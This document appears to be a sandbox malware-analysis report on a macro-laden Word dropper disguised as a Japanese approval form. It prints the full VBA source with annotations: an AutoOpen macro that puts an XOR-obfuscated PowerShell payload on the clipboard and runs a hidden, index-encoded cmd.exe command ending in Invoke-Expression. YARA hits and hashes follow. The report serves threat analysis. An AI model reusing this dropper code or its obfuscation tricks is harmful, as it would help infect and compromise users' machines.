8ed61abc...6ae9 | Files
VTI SCORE: 93/100
Dynamic Analysis Report
Classification: -

8ed61abc371da7cf5ed2d8b9b7fdf20b8ca1b924c19fc9e8d50ca1feaccb6ae9 (SHA256)

(5)DOC20181114214.doc

Word Document

Created at 2018-11-14 09:18:00

Filters:
Filename Category Type Severity Actions
C:\Users\aETAdzjz\Desktop\(5)DOC20181114214.doc Sample File Word Document
Suspicious
Mime Type application/msword
File Size 91.50 KB
MD5 bdd9fe7dae3fc4b751f17f13ec9d41b7
SHA1 07b3785d52e55f55c5613800362f959276b95c57
SHA256 8ed61abc371da7cf5ed2d8b9b7fdf20b8ca1b924c19fc9e8d50ca1feaccb6ae9
SSDeep 1536:a2Svw6xp+hXOl8kqocvvDA3TyHhyRVG4lsIKH:al4K+htnBmVdlw
Office Information
Title 稟 議 書
Revision 7
Create Time 2017-01-25 15:35:00+00:00
Modify Time 2018-11-14 07:51:00+00:00
Last Printed 2015-11-13 15:39:00+00:00
Document Information
Application Microsoft Office Word
App Version 14.0
Template Normal.dotm
Document Security SecurityFlag.NONE
Editing Time 5460.0
Page Count 1
Line Count 3
Paragraph Count 1
Word Count 80
Character Count 459
Chars With Spaces 538
Heading Pairs タイトル, Title
Titles Of Parts 稟 議 書, 稟 議 書
scale_crop False
shared_doc False
VBA Macros (2)
Macro #1: ThisDocument
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
' Empties the Windows clipboard through the user32 clipboard APIs
' (OpenClipboard / EmptyClipboard / CloseClipboard).
' Not referenced by any other routine in this dump; the executed path uses
' Module1.mmm instead.  Note that the only Declare statements for these APIs
' visible in the dump are the Private ones in Module1, which are not callable
' from this module, so this Sub presumably does not resolve as shown - confirm.
Sub ClearClipboard()
    OpenClipboard (0)
    EmptyClipboard
    CloseClipboard
End Sub

' Dropper entry point, reached from AutoOpen.  Two steps:
'   1. njk   - places the text returned by librarybooks() on the clipboard
'              (via Module1.mmm).
'   2. Shell - runs marrsell() + sdemom(), which concatenates to a command
'              beginning "Cmd.exe /V:ON/C" (settler = "C", doublecheck =
'              "md.exe /V:ON/C...").  The window style 14 - 14 = 0 is vbHide,
'              so no console window is shown.
' NOTE(review): the batch command built in doublecheck..sdemom is only
' index-encoded here; whether it consumes the clipboard text staged in step 1
' cannot be read from this dump without decoding it.
Sub Forms2F()
njk
Call Shell(marrsell + sdemom, 14 - 14)
End Sub
' Word auto-execution macro: runs when the document is opened (with macros
' enabled).  Its only action is to call Forms2F.
Sub AutoOpen()
  Forms2F
End Sub
' Returns AndPlus(): the first half of the command string that Forms2F passes
' to Shell.  Pure indirection - one more hop between Shell and the literal.
Function marrsell()
marrsell = AndPlus
End Function
' Copies the concatenated clipboard payload (librarybooks()) to the Windows
' clipboard using Module1.mmm.  The parenthesised argument "mmm (sStr)" forces
' the string to be passed by value.
Sub njk()
sStr = librarybooks
mmm (sStr)
End Sub
' Fragment 1 of the Shell command: the single character "C".  Together with
' doublecheck ("md.exe /V:ON/C...") it spells "Cmd.exe", split so that the
' literal never appears whole in the macro source.
Function settler()
settler = "C"
End Function
' Fragment 2 of the Shell command.  Starts the cmd.exe invocation with delayed
' variable expansion (/V:ON), defines the character table "begw", and opens a
' "for %4 in (...)" loop whose body is in sdemom.  Each number is an index into
' begw; the loop in sdemom reassembles the real command one character at a time.
' The doubled quotes ("") are VBA escapes for a literal " inside the string.
Function doublecheck()
doublecheck = "md.exe /V:ON/C""set begw=r$Oq\a+N,=^^oWR^&;1TSXs{u""""[fQ:K4.7e)-6'pV5zMkCDIxL(yGn8A]UJhmt2B0blP9YwEjgcH3iv}Fd &&for %4 in (38,2,12,70,0,18,74,70,48,48,81,81,35,7,2,38,81,35,12,81,16,81,81,81,24,81,14,81,49,81,1,66,18,58,11,59,33,25,30,55,6,1,38,18,58,2,59,33,25,75,63,55,6,37,19,37,34,81,49,81,49,35,57,2,76,52,25,13,70,72,70,19,55,28,28,59,5,17,73,74,70,20,49,4,24,81,34,81,34,67,75,55,13,5,74,73,25,8,37,79,66,0,37,81,33,44,5,48,66,33,0,73,35,36,67,55,13,5,74,73,25,8,37,62,73,38,37,81,81,33,44,5,48,66,33,0,73,35,81,81,36,75,55,13,5,74,73,25,8,37,29,52,44,37,81,33,44,5,48,66,33,0,73,35,81,81,30,75,55,13,5,74,73,25,8,37,71,22,50,37,81,81,33,44,5,48,66,33,0,73,35,34,37,34,78,80,21,29,52,44,49,34,79,66,0,33,76,79,66,0,8,79,66,0,47,79,66,0,26,35,81,71,22,50,78,63,21,78,16,21,71,22,50,49,31,15,34,78,71,22,50,60,19,62,73,38,70,17,71,22,50,31,78,62,62,73,38,60,21,29,52,44,9,78,80,21,29,52,44,37,6,37,15,71,22,50,60,47,33,62,73,38,17,71,22,50,31,78,37,6,3"
End Function
' Fragment 3 of the Shell command: a continuation of the begw index list
' started in doublecheck.  The first number "7" completes the "37" that
' doublecheck ends with ("...,6,3" + "7,...").
Function formsands()
formsands = "7,62,62,73,38,60,21,29,52,44,15,34,49,33,43,11,77,52,46,31,34,79,66,0,33,60,20,5,79,66,0,8,79,66,0,66,79,66,0,26,35,37,6,37,71,22,50,78,16,21,78,63,21,71,22,50,49,31,78,64,17,21,37,6,37,29,52,44,15,78,70,22,13,62,73,38,17,21,29,52,44,81,37,6,37,9,81,71,22,50,33,7,46,62,73,38,65,62,73,38,76,60,48,22,42,71,22,50,31,78,62,62,73,38,60,21,29,52,44,15,34,79,66,0,33,60,20,50,79,66,0,8,79,66,0,18,37,6,37,79,66,0,8,79,66,0,20,59,0,11,79,79,66,0,8,79,66,0,31,20,69,11,80,52,76,12,31,59,79,66,0,8,79,66,0,47,11,62,79,66,0,8,79,66,37,6,37,0,60,47,33,17,31,79,66,0,26,37,6,37,35,81,71,22,50,78,16,21,78,63,21,78,75,21,78,61,21,78,40,21,78,30,21,71,22,50,49,81,34,79,66,0,60,73,79,66,0,8,79,66,0,7,79,66,0,8,79,66,0,33,71,64,2,35,69,33,79,66,0,26,35,81,71,22,50,78,61,21,78,63,21,78,16,21,71,22,50,49,10,14,81,9,81,78,62,62,73,38,60,21,29,52,44,21,81,33,20,65,33,81,78,34,71,22,50,60,47,62,73,38,33,17,62,73,38,33,80,2,73,46,7,37,6,37,22,71,22,50,28,28,3,54,0,58,46,41,29,"
End Function
' Fragment 4 of the Shell command: more begw indices.  Carries no logic of its
' own; the split into fragments only serves to keep each literal short.
Function cleardatas()
cleardatas = "52,44,81,49,37,6,37,71,22,50,60,47,33,62,73,38,17,60,70,72,71,22,50,28,28,70,22,48,54,39,31,34,81,81,34,79,66,0,67,79,66,0,37,6,37,6,79,66,0,17,30,61,57,79,66,0,49,81,81,34,79,37,6,37,66,0,54,39,79,66,0,8,79,66,0,70,48,62,5,46,0,79,66,0,81,26,35,71,22,50,78,63,21,78,16,21,71,22,50,49,31,81,81,49,81,81,9,78,45,21,29,52,44,21,81,34,79,66,0,54,17,18,79,66,0,81,3,33,35,81,34,49,33,43,11,77,52,46,31,34,79,66,0,18,37,6,37,11,17,79,66,0,8,79,66,0,0,60,79,66,0,8,79,66,0,72,52,76,79,66,0,26,35,71,22,50,78,63,21,78,16,21,78,61,21,71,22,50,49,31,71,22,50,33,60,54,62,73,38,17,62,73,38,18,60,52,70,59,17,13,54,62,73,38,66,54,71,22,50,31,71,22,50,80,54,62,73,38,70,0,58,17,60,7,62,73,38,70,62,73,38,0,13,22,73,71,22,50,28,37,6,37,28,70,56,65,5,39,31,34,81,34,79,66,0,56,79,66,0,6,79,66,0,19,18,79,66,0,6,79,66,0,28,33,37,6,37,65,79,66,0,37,6,37,6,79,66,0,64,5,46,0,5,39,79,66,0,49,81,34,79,66,0,33,51,79,66,0,37,6,37,8,79,66,0,35,17,79,66,0,8,79,66,0,42,70,60,76,79,66"
End Function
' Fragment 5 of the Shell command: more begw indices (see doublecheck for the
' table and sdemom for the loop that consumes them).
Function commde()
commde = ",0,81,26,35,71,22,50,78,63,21,37,6,37,78,16,21,78,61,21,71,22,50,49,31,81,49,81,81,49,81,26,76,49,29,52,44,15,34,79,66,0,12,31,79,66,0,8,79,66,0,20,59,0,11,79,31,37,6,37,20,69,11,80,52,76,79,66,0,8,79,66,0,33,79,66,0,8,79,66,0,60,20,50,18,37,6,37,79,66,0,8,79,37,6,37,66,0,59,79,66,0,26,35,81,71,22,50,78,75,21,78,30,21,78,63,21,78,61,21,78,16,21,71,22,50,49,81,33,59,5,7,50,65,64,59,33,20,20,54,35,81,34,79,66,0,80,54,79,66,0,8,79,66,0,17,35,80,37,6,37,79,66,0,8,79,66,0,37,6,37,33,38,50,79,66,0,26,35,71,22,50,78,63,21,78,16,21,78,61,21,71,22,50,49,10,14,15,78,34,79,66,0,5,11,64,38,76,65,79,66,0,8,79,66,0,44,35,60,33,51,79,66,37,6,37,0,8,79,66,0,80,0,79,66,0,81,26,35,81,71,22,50,78,63,21,78,61,21,78,37,6,37,16,21,71,22,50,49,31,9,78,80,21,29,52,44,21,81,34,63,81,5,33,35,81,34,37,6,37,79,66,0,76,65,44,35,60,79,66,0,8,79,66,0,11,37,6,37,64,38,79,66,0,8,79,66,0,80,0,5,79,66,0,37,6,37,8,79,66,0,33,51,79,66,0,26,35,81,37,6,37,71,22,50,78,16,21,78,37,6,37,61,21,78,75,21"
End Function
' Fragment 6 of the Shell command: more begw indices.  Last fragment that
' AndPlus concatenates; sdemom supplies the remainder of the list plus the
' loop body.
Function crsss()
crsss = ",78,63,21,71,22,50,49,81,34,79,66,0,59,79,66,0,8,79,66,0,73,72,79,66,0,81,26,35,81,71,22,50,78,16,21,78,63,21,71,22,50,49,10,14,49,81,26,76,15,37,6,37,81,34,79,66,0,60,47,33,79,66,0,8,79,66,0,60,5,79,66,0,8,79,66,0,54,17,5,79,66,0,8,79,66,0,42,37,6,37,13,2,79,37,6,37,79,66,0,8,79,66,0,17,31,18,59,0,11,26,31,18,12,11,45,7,76,69,31,59,33,79,66,0,37,6,37,8,79,66,0,80,79,66,0,8,79,66,0,17,20,68,20,79,66,0,26,35,71,22,50,78,40,21,78,75,21,78,30,21,78,16,21,78,37,6,37,36,21,78,61,21,78,63,21,71,22,50,49,55,33,66,68,17,25,81,81,9,81,27,54,13,74,46,41,29,52,44,81,81,37,6,37,15,81,34,79,66,0,65,44,31,18,79,66,0,8,79,66,0,59,13,11,79,66,0,8,79,66,0,45,79,66,0,8,79,66,0,26,79,66,0,8,79,66,0,0,5,11,79,66,0,8,79,66,0,69,31,42,70,17,18,79,66,0,8,79,66,0,64,66,46,79,66,0,8,79,66,0,20,79,66,0,8,79,66,0,68,79,66,0,8,79,66,0,31,20,12,11,45,52,46,79,66,0,79,35,71,22,50,78,32,21,78,40,21,78,75,21,78,67,21,78,53,37,6,37,21,78,36,21,78,37,6,37,63,21,78,30,21,78,16,21,78,61,21,71,22,50,49,55,33,66"
End Function
' Joins Shell-command fragments 1-6 in order:
'   settler + doublecheck + formsands + cleardatas + commde + crsss
' Returned to Forms2F through marrsell; sdemom is appended there to finish
' the string.
Function AndPlus()
AndPlus = settler + doublecheck + formsands + cleardatas + commde + crsss
End Function
' Final fragment of the Shell command.  Closes the begw index list and holds
' the loop body:
'   do set tGCX=!tGCX!!begw:~%4,1!   - appends begw[%4] to tGCX per iteration
'   if %4 geq 83 cmd.exe /C!tGCX:~-1865!  - once the last index (83) is seen,
'       executes the trailing 1865 characters of the rebuilt string.
' The decoded command is not visible in this dump; decode begw/indices
' offline to recover it.
Function sdemom()
sdemom = ",68,17,25,81,9,67,17,30,61,37,6,37,71,29,52,44,81,81,15,34,79,66,0,60,79,66,0,37,6,37,8,79,66,0,54,33,0,74,17,79,66,0,8,79,66,0,31,51,7,76,45,79,66,0,8,79,66,0,80,54,79,66,0,8,79,37,6,37,66,0,70,0,58,79,66,0,26,35,71,22,37,6,37,50,78,16,21,78,63,21,78,30,21,78,61,21,78,75,21,71,22,50,49,37,6,37,55,33,38,50,60,25,81,81,9,81,22,19,20,29,52,44,37,6,37,81,37,49,49,81,49,81,34,37,47,37,6,55,30,75,25,33,59,2,74,18,38,1,6,55,16,61,25,33,59,11,58,20,66,1,81,49,10,14,81,4,24,8,37,31,37,81,8,37,0,76,72,74,17,37,6,37,60,2,37,6,37,65,33,79,17,37,81,34,34,81,34,81,24,83)do set tGCX=!tGCX!!begw:~%4,1!&&if %4 geq 83 cmd.exe /C!tGCX:~-1865!"""
End Function


' Builds the clipboard payload that njk hands to Module1.mmm:
'   samrdee + AcrivDoxs + checkpic   - the PowerShell-style text, in order
'   treedocuments, FunctionalProperties, CalculationOne - all return "" and
'       contribute nothing (padding / decoy helpers).
Function librarybooks()
librarybooks = samrdee + AcrivDoxs + checkpic + treedocuments + FunctionalProperties + CalculationOne
End Function
' Clipboard-payload fragment 1.  Opens with " -JO" + "in (" (i.e. "-JOin (",
' split so the keyword is not a single literal) followed by a list of numbers
' separated by assorted single-character delimiters.  The delimiter set and
' the decode step (split, XOR 0x45, invoke) are in checkpic.
Function samrdee()
samrdee = " -JO" + "in ('107%101_109v101r97O22O45O0r41r9U12H33%30_116_24H110v97_54H13U0{41_41r12O1U30O116H118{24<110_98v29H98v108v109c101<11{32<18v104U10%39<15_32H38H49O101v22O60<22v49r32c8{107v44U42_107H6H42U40_53{55U0{54v22O44U10O11%107r1_0H3U41v36%49<32O22v49H23r0v4H40O109c101v30_12<42_107<40%0H40c42H55H28O22H17%55%0r4%40O24c30U54_28r54v17U0O8<107<6%42_11{19%32{55r49c24{127<127H35v55{10v8v7U4r54U32<115U113%54%17v55U44O43v34H109U98{17%31<3_7v39H124_53O4U0r12r29%106v60{54{47H44v28%0_49_113c39_20%33v47<42c41{34O112{23%1{20U15%16c34v12U124H34%8H20<45v55r36c55{116{32r42O60v118H55O13_32U49{119O36U18H2H12{51_112v114H3r115r15U14c48<38r115v125O39r106v17c32<2{124{41{4O2c9c115U44c44{114U33O22r55<117U106U18r28r35{33O48<7v3c38r28c54{33H18r45{52%112%7H32_1O13U29%38U54{35O40r7c6%9<16O113v55{16<124<33_31v23v17<0c22O110O112H0c6H61H110_44_112v35_20_63{14_115v39r23%32<29U20O34_31U23v110O1_116O55<43_110O12H16%40r117H11{13_51H60%40{1{7c33%12%53U23O54U53%14H115v31c8O55H49H34r13c"
End Function
' Clipboard-payload fragment 2: continuation of the delimited number list
' started in samrdee.
Function AcrivDoxs()
AcrivDoxs = "4c23c41r28{50O44U112U36r8v8U55U4c19c9U1v47{28c63O10v2_63<52{33H7U112c12U10O113_113%18U61c114%47_28v49H23H117{117O21v47_61v6r8_16%21H124r112%125O8U114H115H13v113r22<33r33%4<115O15v113r23r2H1r38<51r49%3{118c51c17H41_36c7v7<32%51U38v12r45O106v41r114{124v23c48{13c34_8r50<124O39c42H18v11c39v55%10_31O14<42c43v31H29H3_19r54O34<55{112<0{54%32r115%55U55%8U1r45O28<53%15v47H51{106O8U114%39{18%112U52v106<16v44_40O32H17c3_46c14<42r36O110%46U11U42c10O3<116v20r36c60O41U14v16H41H110c0%2U23U41r118H4_54{125H34r44U32H110U41c115c45O21<106H54<40{29H17%14v33c63_11r44H46H34{21v7{49{54H19v40H110O47{117_13U15r21r38H12r55H44v55c119%15{28%11v115v22_115_17U4v53U38r53r36r60c60<33_118c124%13c38{51r60<3v11_36%125v113U22O17%106U28r125U106{116_1O53_11r54v61_55{15r31O11c54U40U1<115O10O39r50r40c61_40r117{8U55r61r110%46<20%53{51H17v28H119r51H0O36<21{22%10U46U115_35c36r22v51<35<113%51_113U60%51O106U114{45<106v9v18r12%29{110H63v112_14{9_7%118H117U40O44r119c23c2_49c124_54H54H51%41_125c34r125r120%98H108"
End Function
' Clipboard-payload fragment 3: the tail of the number list plus the decoder.
' After the closing quote the text splits on each delimiter character
' ('{', 'C', 'u', '<', '%', 'h', 'V', 'O', '_', 'R'; -split is case-insensitive
' in PowerShell, which is presumably why 'C'/'c', 'h'/'H', 'u'/'U', 'V'/'v'
' and 'R'/'r' all act as delimiters - confirm), then pipes each value through
' a command assembled with -f format strings:
'   ("{3}{1}{0}{2}" -f 'CH-','ORea','oBjEcT','f')  -> "fOReaCH-oBjEcT"
'   [ChAR] ($_ -bXoR ("{0}{1}" -f '0x','45'))      -> XOR each value with 0x45
'   .("{0}{1}" -f 'I','eX')                        -> "IeX", i.e. Invoke-Expression
' The format-string splitting hides the cmdlet names from plain string
' matching.  The decoded script is not visible in this dump.
Function checkpic()
checkpic = "U105%30%44v10r107v38%42U8v53{55_32O22<54H44%42r43H107H6%10O40r53O55{32_54c22<44v42r43O8<10O1<32{24%127c127H33r0%38<10O8H53{55H0U22<54c108O57v35v42O23v32v36<38{45v101O62{101<11{32H18<104v10U39O15U32<38v49_101r101v44<42H107v54_49_23{0v4<40c23{0c36_1H32<23r109{97O26v101_105_30<17_0c61{17<107r0r43U6O42H33v12v11v2O24%127H127v36H22%38<12U12%108{101_56r101{57H3v10H55v32%36c38U13r62U101v97{26<107v55<32H4O33{49v42v32U11_1c109U108r101_56H108' -split '{' -SPlIT 'C'-sPLIt 'u'-SplIT '<' -SPLit'%'-SplIT 'h'-sPlIt'V'-SpLit'O'-SpLiT'_' -SPLiT'R'| .(""{3}{1}{0}{2}"" -f 'CH-','ORea','oBjEcT','f'){ [ChAR] (${_} -bXoR(""{0}{1}"" -f '0x','45')) } )|.(""{0}{1}"" -f 'I','eX')"
End Function
' Returns an empty string; included in the librarybooks concatenation but
' contributes nothing (padding / decoy).
Function treedocuments()
treedocuments = ""
End Function
' Returns an empty string; included in the librarybooks concatenation but
' contributes nothing (padding / decoy).
Function FunctionalProperties()
FunctionalProperties = ""
End Function
' Returns an empty string; included in the librarybooks concatenation but
' contributes nothing (padding / decoy).
Function CalculationOne()
CalculationOne = ""
End Function

Macro #2: Module1
Attribute VB_Name = "Module1"
Option Explicit
' Win32 imports used by mmm to put text on the clipboard.  All Declares are
' Private, so they are only callable from this module.
' GlobalFree is declared but never called anywhere in this dump: memory
' allocated by mmm is never released on its failure paths.
Private Declare PtrSafe Function GlobalAlloc Lib "kernel32" (ByVal wFlags As Long, ByVal dwBytes As LongPtr) As LongPtr
Private Declare PtrSafe Function GlobalFree Lib "kernel32" (ByVal hMem As LongPtr) As LongPtr
Private Declare PtrSafe Function GlobalLock Lib "kernel32" (ByVal hMem As LongPtr) As LongPtr
Private Declare PtrSafe Function GlobalSize Lib "kernel32" (ByVal hMem As LongPtr) As LongPtr
Private Declare PtrSafe Function GlobalUnlock Lib "kernel32" (ByVal hMem As LongPtr) As Long
Private Declare PtrSafe Function OpenClipboard Lib "user32" (ByVal hwnd As LongPtr) As Long
Private Declare PtrSafe Function CloseClipboard Lib "user32" () As Long
Private Declare PtrSafe Function EmptyClipboard Lib "user32" () As Long
Private Declare PtrSafe Function SetClipboardData Lib "user32" (ByVal wFormat As Long, ByVal hMem As LongPtr) As LongPtr
Private Declare PtrSafe Function GetClipboardData Lib "user32" (ByVal wFormat As Long) As LongPtr
' lstrcpy takes both pointers "As Any" so a VBA String can be passed directly
' as the source buffer.
Private Declare PtrSafe Function lstrcpy Lib "kernel32" (ByVal lpString1 As Any, ByVal lpString2 As Any) As LongPtr

' GlobalAlloc flags: GHND = movable + zero-initialised block.
Private Const GMEM_MOVEABLE = &H2
Private Const GMEM_ZEROINIT = &H40
Private Const GHND = (GMEM_MOVEABLE Or GMEM_ZEROINIT)

' CF_TEXT = 1 is the ANSI text clipboard format used by SetClipboardData.
' MAXSIZE is not referenced anywhere in this dump.
Public Const CF_TEXT = 1
Public Const MAXSIZE = 4096

' Places MyString on the Windows clipboard as CF_TEXT.  Called by
' ThisDocument.njk with the concatenated librarybooks() text.
' Sequence: GlobalAlloc -> GlobalLock -> lstrcpy -> GlobalUnlock ->
' OpenClipboard -> EmptyClipboard -> SetClipboardData -> CloseClipboard.
' Review notes (defects visible in this body, none fixed here):
'   - GlobalLock's return value is not checked; lstrcpy is called even if it
'     returned 0.
'   - If OpenClipboard fails the Sub exits without freeing hGlobalMemory
'     (GlobalFree is never called); the same applies to the OutOfHere path.
'   - SetClipboardData's result (hClipMemory) is never checked.
Sub mmm(MyString As String)
    Dim hGlobalMemory As LongPtr, lpGlobalMemory As LongPtr
    Dim hClipMemory As LongPtr, X As Long


    ' Movable, zeroed block with room for the string plus a NUL terminator.
    hGlobalMemory = GlobalAlloc(GHND, Len(MyString) + 1)


    lpGlobalMemory = GlobalLock(hGlobalMemory)


    ' Copy the VBA string into the global block (lstrcpy takes "As Any").
    lpGlobalMemory = lstrcpy(lpGlobalMemory, MyString)


    ' Non-zero means the block is still locked; bail out to the close step.
    If GlobalUnlock(hGlobalMemory) <> 0 Then

       GoTo OutOfHere
    End If


    ' 0& = NULL owner window; the clipboard is opened without an owner.
    If OpenClipboard(0&) = 0 Then

       Exit Sub
    End If


    X = EmptyClipboard()


    ' On success the system takes ownership of hGlobalMemory, which is why
    ' it is not freed on the normal path.
    hClipMemory = SetClipboardData(CF_TEXT, hGlobalMemory)

OutOfHere:
    If CloseClipboard() = 0 Then
       MsgBox "*"
    End If
End Sub

YARA Matches
Rule Name Rule Description Classification Severity Actions
Document_Contains_Execution_Commands Execution commands inside a document; possible dropper -
3/5
Document_Contains_Execution_Commands Execution commands inside a document; possible dropper -
3/5
Document_Contains_Execution_Commands Execution commands inside a document; possible dropper -
3/5
Document_Contains_Execution_Commands Execution commands inside a document; possible dropper -
3/5
c:\users\aetadzjz\appdata\local\gdipfontcachev1.dat Modified File Stream
Unknown
Mime Type application/octet-stream
File Size 109.69 KB
MD5 8c07b597e04adb6ef1c7a91e611668d8
SHA1 03bfce03604869383ecb864c4d8ab9b99d4af8c8
SHA256 63304f19e0ad5ec509b7e5484ec4074b451db2379f2838de3b4b2c14c8b6dd8c
SSDeep 1536:A2cnwUXHgTlmIUxyX337I5NZjP4LMLzZ5KsLJ:PTArrHvLJ